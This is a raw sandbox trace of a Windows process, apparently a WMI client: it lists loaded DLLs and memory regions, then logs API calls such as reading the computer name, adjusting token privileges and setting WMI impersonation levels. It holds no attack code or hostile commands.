region_type = pagefile_backed
name = "pagefile_0x0000000001b90000"
filename = ""
Region:
id = 4926
start_va = 0x7fefe4f0000
end_va = 0x7feff277fff
monitored = 0
entry_point = 0x7fefe56cebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 4927
start_va = 0x260000
end_va = 0x260fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000260000"
filename = ""
Region:
id = 4928
start_va = 0x7fefdb80000
end_va = 0x7fefdb8efff
monitored = 0
entry_point = 0x7fefdb819b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 4929
start_va = 0x1ba0000
end_va = 0x1baffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 4930
start_va = 0x1bb0000
end_va = 0x1bb7fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 4931
start_va = 0x1bc0000
end_va = 0x1bcffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 4932
start_va = 0x1bc0000
end_va = 0x1bcffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 4933
start_va = 0x7fefbc00000
end_va = 0x7fefbc2cfff
monitored = 0
entry_point = 0x7fefbc01010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 4934
start_va = 0x7fefe110000
end_va = 0x7fefe161fff
monitored = 0
entry_point = 0x7fefe1110d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 4935
start_va = 0x7fefd2b0000
end_va = 0x7fefd30afff
monitored = 0
entry_point = 0x7fefd2b6940
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 4936
start_va = 0x29a0000
end_va = 0x2c0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000029a0000"
filename = ""
Region:
id = 4937
start_va = 0x7fefc4d0000
end_va = 0x7fefc525fff
monitored = 0
entry_point = 0x7fefc4dbbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 4938
start_va = 0x29a0000
end_va = 0x2b7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000029a0000"
filename = ""
Region:
id = 4939
start_va = 0x2b90000
end_va = 0x2c0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b90000"
filename = ""
Region:
id = 4940
start_va = 0x29a0000
end_va = 0x2a7efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000029a0000"
filename = ""
Region:
id = 4941
start_va = 0x2b00000
end_va = 0x2b7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b00000"
filename = ""
Region:
id = 4942
start_va = 0x23b0000
end_va = 0x242ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000023b0000"
filename = ""
Region:
id = 4943
start_va = 0x2440000
end_va = 0x24bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002440000"
filename = ""
Region:
id = 4944
start_va = 0x7fefd490000
end_va = 0x7fefd4a7fff
monitored = 0
entry_point = 0x7fefd493b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 4945
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 4946
start_va = 0x1f30000
end_va = 0x1f74fff
monitored = 0
entry_point = 0x1f31064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 4947
start_va = 0x1fd0000
end_va = 0x204ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001fd0000"
filename = ""
Region:
id = 4948
start_va = 0x1f30000
end_va = 0x1f74fff
monitored = 0
entry_point = 0x1f31064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 4949
start_va = 0x1f30000
end_va = 0x1f74fff
monitored = 0
entry_point = 0x1f31064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 4950
start_va = 0x1f30000
end_va = 0x1f74fff
monitored = 0
entry_point = 0x1f31064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 4951
start_va = 0x1f30000
end_va = 0x1f74fff
monitored = 0
entry_point = 0x1f31064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 4952
start_va = 0x7fefd190000
end_va = 0x7fefd1d6fff
monitored = 0
entry_point = 0x7fefd191064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 4953
start_va = 0x7fefdb60000
end_va = 0x7fefdb73fff
monitored = 0
entry_point = 0x7fefdb610e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 4954
start_va = 0x2d20000
end_va = 0x2d9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002d20000"
filename = ""
Region:
id = 4955
start_va = 0x7fffffd8000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 4956
start_va = 0x2db0000
end_va = 0x2e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002db0000"
filename = ""
Region:
id = 4957
start_va = 0x2e40000
end_va = 0x2ebffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002e40000"
filename = ""
Region:
id = 4958
start_va = 0x7fffffd3000
end_va = 0x7fffffd4fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 4959
start_va = 0x7fffffd6000
end_va = 0x7fffffd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd6000"
filename = ""
Region:
id = 4960
start_va = 0x7fef7280000
end_va = 0x7fef7292fff
monitored = 0
entry_point = 0x7fef7287b68
region_type = mapped_file
name = "msoxmlmf.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSOXMLMF.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\msoxmlmf.dll")
Region:
id = 4961
start_va = 0x7fef9ac0000
end_va = 0x7fef9ad8fff
monitored = 0
entry_point = 0x7fef9acee50
region_type = mapped_file
name = "vcruntime140.dll"
filename = "\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll")
Region:
id = 4962
start_va = 0x7fef9ab0000
end_va = 0x7fef9ab3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-runtime-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-runtime-l1-1-0.dll")
Region:
id = 4963
start_va = 0x7fef99b0000
end_va = 0x7fef9aa1fff
monitored = 0
entry_point = 0x7fef99b9060
region_type = mapped_file
name = "ucrtbase.dll"
filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")
Region:
id = 4964
start_va = 0x7fef99a0000
end_va = 0x7fef99a2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-timezone-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll")
Region:
id = 4965
start_va = 0x7fef9990000
end_va = 0x7fef9992fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-file-l2-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l2-1-0.dll")
Region:
id = 4966
start_va = 0x7fef9980000
end_va = 0x7fef9982fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-localization-l1-2-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-localization-l1-2-0.dll")
Region:
id = 4967
start_va = 0x7fefb590000
end_va = 0x7fefb592fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-synch-l1-2-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll")
Region:
id = 4968
start_va = 0x7fef9970000
end_va = 0x7fef9972fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-processthreads-l1-1-1.dll"
filename = "\\Windows\\System32\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll")
Region:
id = 4969
start_va = 0x7fef9960000
end_va = 0x7fef9962fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-file-l1-2-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l1-2-0.dll")
Region:
id = 4970
start_va = 0x7fef9950000
end_va = 0x7fef9952fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-heap-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-heap-l1-1-0.dll")
Region:
id = 4971
start_va = 0x7fef9940000
end_va = 0x7fef9943fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-string-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-string-l1-1-0.dll")
Region:
id = 4972
start_va = 0x7fef9930000
end_va = 0x7fef9933fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-stdio-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-stdio-l1-1-0.dll")
Region:
id = 4973
start_va = 0x7fef9920000
end_va = 0x7fef9923fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-convert-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-convert-l1-1-0.dll")
Region:
id = 4974
start_va = 0x1bd0000
end_va = 0x1bd0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001bd0000"
filename = ""
Region:
id = 4975
start_va = 0x1f30000
end_va = 0x1f30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f30000"
filename = ""
Region:
id = 4976
start_va = 0x7fef8220000
end_va = 0x7fef8232fff
monitored = 0
entry_point = 0x7fef8221d80
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 4977
start_va = 0x7fef88c0000
end_va = 0x7fef8992fff
monitored = 0
entry_point = 0x7fef8938b00
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 4978
start_va = 0x7fef8890000
end_va = 0x7fef88b6fff
monitored = 0
entry_point = 0x7fef88911a0
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 4979
start_va = 0x1f40000
end_va = 0x1f63fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001f40000"
filename = ""
Region:
id = 4980
start_va = 0x2c10000
end_va = 0x2d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002c10000"
filename = ""
Region:
id = 5200
start_va = 0x7fef5950000
end_va = 0x7fef5966fff
monitored = 0
entry_point = 0x7fef595eba0
region_type = mapped_file
name = "wmi2xml.dll"
filename = "\\Windows\\System32\\wbem\\xml\\wmi2xml.dll" (normalized: "c:\\windows\\system32\\wbem\\xml\\wmi2xml.dll")
Region:
id = 5201
start_va = 0x2ec0000
end_va = 0x2fbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002ec0000"
filename = ""
Region:
id = 5202
start_va = 0x7fef58b0000
end_va = 0x7fef5949fff
monitored = 1
entry_point = 0x7fef58be1b8
region_type = mapped_file
name = "vbscript.dll"
filename = "\\Windows\\System32\\vbscript.dll" (normalized: "c:\\windows\\system32\\vbscript.dll")
Region:
id = 5203
start_va = 0x1f40000
end_va = 0x1f5afff
monitored = 0
entry_point = 0x1f76b00
region_type = mapped_file
name = "msxml3.dll"
filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll")
Region:
id = 5204
start_va = 0x7fefda80000
end_va = 0x7fefdb10fff
monitored = 0
entry_point = 0x7fefda81440
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 5205
start_va = 0x1f60000
end_va = 0x1f63fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "stdole2.tlb"
filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb")
Region:
id = 5206
start_va = 0x2fc0000
end_va = 0x35ccfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002fc0000"
filename = ""
Thread:
id = 242
os_tid = 0x440
[0562.092] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xafa10 | out: lpSystemTimeAsFileTime=0xafa10*(dwLowDateTime=0x693e7e90, dwHighDateTime=0x1dab599))
[0562.092] GetCurrentProcessId () returned 0x520
[0562.092] GetCurrentThreadId () returned 0x440
[0562.092] GetTickCount () returned 0x24dfa
[0562.092] QueryPerformanceCounter (in: lpPerformanceCount=0xafa18 | out: lpPerformanceCount=0xafa18*=2095513829159) returned 1
[0562.093] GetModuleHandleW (lpModuleName=0x0) returned 0xffa60000
[0562.093] __set_app_type (_Type=0x1)
[0562.093] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffaaced0) returned 0x0
[0562.093] __wgetmainargs (in: _Argc=0xffad2380, _Argv=0xffad2390, _Env=0xffad2388, _DoWildCard=0, _StartInfo=0xffad239c | out: _Argc=0xffad2380, _Argv=0xffad2390, _Env=0xffad2388) returned 0
[0562.095] ??0CHString@@QEAA@XZ () returned 0xffad2ab0
[0562.097] malloc (_Size=0x30) returned 0x185b20
[0562.098] malloc (_Size=0x70) returned 0x187bc0
[0562.098] malloc (_Size=0x50) returned 0x187c40
[0562.098] malloc (_Size=0x30) returned 0x187ca0
[0562.098] malloc (_Size=0x48) returned 0x187ce0
[0562.098] malloc (_Size=0x30) returned 0x187d30
[0562.098] malloc (_Size=0x30) returned 0x187d70
[0562.098] ??0CHString@@QEAA@XZ () returned 0xffad2f58
[0562.098] malloc (_Size=0x30) returned 0x187db0
[0562.098] ?Empty@CHString@@QEAAXXZ () returned 0x7fef5b8c96c
[0562.098] SetConsoleCtrlHandler (HandlerRoutine=0xffaa5724, Add=1) returned 1
[0562.099] _onexit (_Func=0xffabf378) returned 0xffabf378
[0562.099] _onexit (_Func=0xffabf490) returned 0xffabf490
[0562.099] _onexit (_Func=0xffabf4d0) returned 0xffabf4d0
[0562.099] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0562.099] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0562.109] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
[0562.132] CoCreateInstance (in: rclsid=0xffa673a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffa67370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xffad2940 | out: ppv=0xffad2940*=0x29cc20) returned 0x0
[0562.154] GetCurrentProcess () returned 0xffffffffffffffff
[0562.154] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0xaf7e0 | out: TokenHandle=0xaf7e0*=0x108) returned 1
[0562.154] GetTokenInformation (in: TokenHandle=0x108, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xaf7d8 | out: TokenInformation=0x0, ReturnLength=0xaf7d8) returned 0
[0562.154] malloc (_Size=0x40) returned 0x187f00
[0562.154] GetTokenInformation (in: TokenHandle=0x108, TokenInformationClass=0x3, TokenInformation=0x187f00, TokenInformationLength=0x40, ReturnLength=0xaf7d8 | out: TokenInformation=0x187f00, ReturnLength=0xaf7d8) returned 1
[0562.154] AdjustTokenPrivileges (in: TokenHandle=0x108, DisableAllPrivileges=0, NewState=0x187f00*(PrivilegesCount=0x5, Privileges=((Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=3, Attributes=0x19), (Luid.LowPart=0x2, Luid.HighPart=33, Attributes=0x0), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=943592138, Attributes=0x2b29))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0562.155] free (_Block=0x187f00)
[0562.155] CloseHandle (hObject=0x108) returned 1
[0562.157] malloc (_Size=0x40) returned 0x187f00
[0562.157] malloc (_Size=0x40) returned 0x187f50
[0562.157] malloc (_Size=0x40) returned 0x1865e0
[0562.157] malloc (_Size=0x20a) returned 0x186630
[0562.157] GetSystemDirectoryW (in: lpBuffer=0x186630, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0562.158] free (_Block=0x186630)
[0562.158] malloc (_Size=0x18) returned 0x187fa0
[0562.158] malloc (_Size=0x18) returned 0x37dfa0
[0562.158] malloc (_Size=0x18) returned 0x186630
[0562.158] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13
[0562.158] SysStringLen (param_1="\\kernel32.dll") returned 0xd
[0562.158] memcpy (in: _Dst=0x2a42a8, _Src=0x2a1458, _Size=0x28 | out: _Dst=0x2a42a8) returned 0x2a42a8
[0562.158] memcpy (in: _Dst=0x2a42ce, _Src=0x2a1498, _Size=0x1c | out: _Dst=0x2a42ce) returned 0x2a42ce
[0562.159] free (_Block=0x187fa0)
[0562.159] free (_Block=0x37dfa0)
[0562.159] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77b10000
[0562.159] GetProcAddress (hModule=0x77b10000, lpProcName="SetThreadUILanguage") returned 0x77b261e0
[0562.159] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0562.159] FreeLibrary (hLibModule=0x77b10000) returned 1
[0562.159] free (_Block=0x186630)
[0562.159] _vsnwprintf (in: _Buffer=0x1865e0, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0xaf408 | out: _Buffer="ms_409") returned 6
[0562.160] malloc (_Size=0x20) returned 0x37dfa0
[0562.160] GetComputerNameW (in: lpBuffer=0x37dfa0, nSize=0xaf7e0 | out: lpBuffer="Q9IATRKPRH", nSize=0xaf7e0) returned 1
[0562.160] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0562.160] malloc (_Size=0x16) returned 0x187fa0
[0562.160] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0562.160] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0xaf7d8 | out: lpNameBuffer=0x0, nSize=0xaf7d8) returned 0x7fffffde000
[0562.163] GetLastError () returned 0xea
[0562.163] malloc (_Size=0x2c) returned 0x186630
[0562.163] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x186630, nSize=0xaf7d8 | out: lpNameBuffer="Q9IATRKPRH\\kEecfMwgj", nSize=0xaf7d8) returned 0x1
[0562.164] lstrlenW (lpString="") returned 0
[0562.164] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0562.164] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Q9IATRKPRH", cchCount1=10, lpString2="", cchCount2=0) returned 3
[0562.167] lstrlenW (lpString=".") returned 1
[0562.167] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0562.167] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Q9IATRKPRH", cchCount1=10, lpString2=".", cchCount2=1) returned 3
[0562.167] lstrlenW (lpString="LOCALHOST") returned 9
[0562.167] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0562.167] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Q9IATRKPRH", cchCount1=10, lpString2="LOCALHOST", cchCount2=9) returned 3
[0562.167] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0562.167] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0562.167] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Q9IATRKPRH", cchCount1=10, lpString2="Q9IATRKPRH", cchCount2=10) returned 2
[0562.168] free (_Block=0x187fa0)
[0562.168] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0562.168] malloc (_Size=0x16) returned 0x187fa0
[0562.168] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0562.168] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0562.168] malloc (_Size=0x16) returned 0x186670
[0562.168] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0562.168] malloc (_Size=0x8) returned 0x186690
[0562.168] malloc (_Size=0x18) returned 0x1866b0
[0562.168] malloc (_Size=0x30) returned 0x1866d0
[0562.168] malloc (_Size=0x18) returned 0x186710
[0562.168] SysStringLen (param_1="IDENTIFY") returned 0x8
[0562.168] SysStringLen (param_1="ANONYMOUS") returned 0x9
[0562.168] SysStringLen (param_1="ANONYMOUS") returned 0x9
[0562.168] SysStringLen (param_1="IDENTIFY") returned 0x8
[0562.168] malloc (_Size=0x30) returned 0x186730
[0562.168] malloc (_Size=0x18) returned 0x186770
[0562.168] SysStringLen (param_1="IMPERSONATE") returned 0xb
[0562.168] SysStringLen (param_1="ANONYMOUS") returned 0x9
[0562.169] SysStringLen (param_1="IMPERSONATE") returned 0xb
[0562.169] SysStringLen (param_1="IDENTIFY") returned 0x8
[0562.169] SysStringLen (param_1="IDENTIFY") returned 0x8
[0562.169] SysStringLen (param_1="IMPERSONATE") returned 0xb
[0562.169] malloc (_Size=0x30) returned 0x186790
[0562.169] malloc (_Size=0x18) returned 0x1867d0
[0562.169] SysStringLen (param_1="DELEGATE") returned 0x8
[0562.169] SysStringLen (param_1="IDENTIFY") returned 0x8
[0562.169] SysStringLen (param_1="DELEGATE") returned 0x8
[0562.169] SysStringLen (param_1="ANONYMOUS") returned 0x9
[0562.169] SysStringLen (param_1="ANONYMOUS") returned 0x9
[0562.169] SysStringLen (param_1="DELEGATE") returned 0x8
[0562.169] malloc (_Size=0x30) returned 0x1867f0
[0562.169] malloc (_Size=0x18) returned 0x186830
[0562.169] malloc (_Size=0x30) returned 0x186850
[0562.169] malloc (_Size=0x18) returned 0x186890
[0562.169] SysStringLen (param_1="NONE") returned 0x4
[0562.169] SysStringLen (param_1="DEFAULT") returned 0x7
[0562.169] SysStringLen (param_1="DEFAULT") returned 0x7
[0562.169] SysStringLen (param_1="NONE") returned 0x4
[0562.169] malloc (_Size=0x30) returned 0x1868b0
[0562.169] malloc (_Size=0x18) returned 0x1868f0
[0562.169] SysStringLen (param_1="CONNECT") returned 0x7
[0562.169] SysStringLen (param_1="DEFAULT") returned 0x7
[0562.170] malloc (_Size=0x30) returned 0x186910
[0562.170] malloc (_Size=0x18) returned 0x186950
[0562.170] SysStringLen (param_1="CALL") returned 0x4
[0562.170] SysStringLen (param_1="DEFAULT") returned 0x7
[0562.170] SysStringLen (param_1="CALL") returned 0x4
[0562.170] SysStringLen (param_1="CONNECT") returned 0x7
[0562.170] malloc (_Size=0x30) returned 0x186970
[0562.170] malloc (_Size=0x18) returned 0x1869b0
[0562.170] SysStringLen (param_1="PKT") returned 0x3
[0562.170] SysStringLen (param_1="DEFAULT") returned 0x7
[0562.170] SysStringLen (param_1="PKT") returned 0x3
[0562.170] SysStringLen (param_1="NONE") returned 0x4
[0562.170] SysStringLen (param_1="NONE") returned 0x4
[0562.170] SysStringLen (param_1="PKT") returned 0x3
[0562.170] malloc (_Size=0x30) returned 0x188000
[0562.170] malloc (_Size=0x18) returned 0x186dd0
[0562.171] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0562.171] SysStringLen (param_1="DEFAULT") returned 0x7
[0562.171] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0562.171] SysStringLen (param_1="NONE") returned 0x4
[0562.171] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0562.171] SysStringLen (param_1="PKT") returned 0x3
[0562.171] SysStringLen (param_1="PKT") returned 0x3
[0562.171] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0562.171] malloc (_Size=0x30) returned 0x188040
[0562.171] malloc (_Size=0x18) returned 0x186df0
[0562.171] SysStringLen (param_1="PKTPRIVACY") returned 0xa
[0562.171] SysStringLen (param_1="DEFAULT") returned 0x7
[0562.171] SysStringLen (param_1="PKTPRIVACY") returned 0xa
[0562.171] SysStringLen (param_1="PKT") returned 0x3
[0562.171] SysStringLen (param_1="PKTPRIVACY") returned 0xa
[0562.171] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0562.171] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0562.171] SysStringLen (param_1="PKTPRIVACY") returned 0xa
[0562.172] malloc (_Size=0x30) returned 0x188080
[0562.172] malloc (_Size=0x40) returned 0x186e10
[0562.172] malloc (_Size=0x20a) returned 0x188fd0
[0562.172] GetSystemDirectoryW (in: lpBuffer=0x188fd0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0562.173] free (_Block=0x188fd0)
[0562.173] malloc (_Size=0x18) returned 0x186e60
[0562.173] malloc (_Size=0x18) returned 0x189000
[0562.173] malloc (_Size=0x18) returned 0x189020
[0562.173] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13
[0562.173] SysStringLen (param_1="\\wbem\\") returned 0x6
[0562.173] memcpy (in: _Dst=0x2866c8, _Src=0x2a1498, _Size=0x28 | out: _Dst=0x2866c8) returned 0x2866c8
[0562.173] memcpy (in: _Dst=0x2866ee, _Src=0x2a0ac8, _Size=0xe | out: _Dst=0x2866ee) returned 0x2866ee
[0562.173] free (_Block=0x186e60)
[0562.173] free (_Block=0x189000)
[0562.173] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32
[0562.174] free (_Block=0x189020)
[0562.174] malloc (_Size=0x18) returned 0x189020
[0562.174] malloc (_Size=0x18) returned 0x189000
[0562.174] malloc (_Size=0x18) returned 0x189040
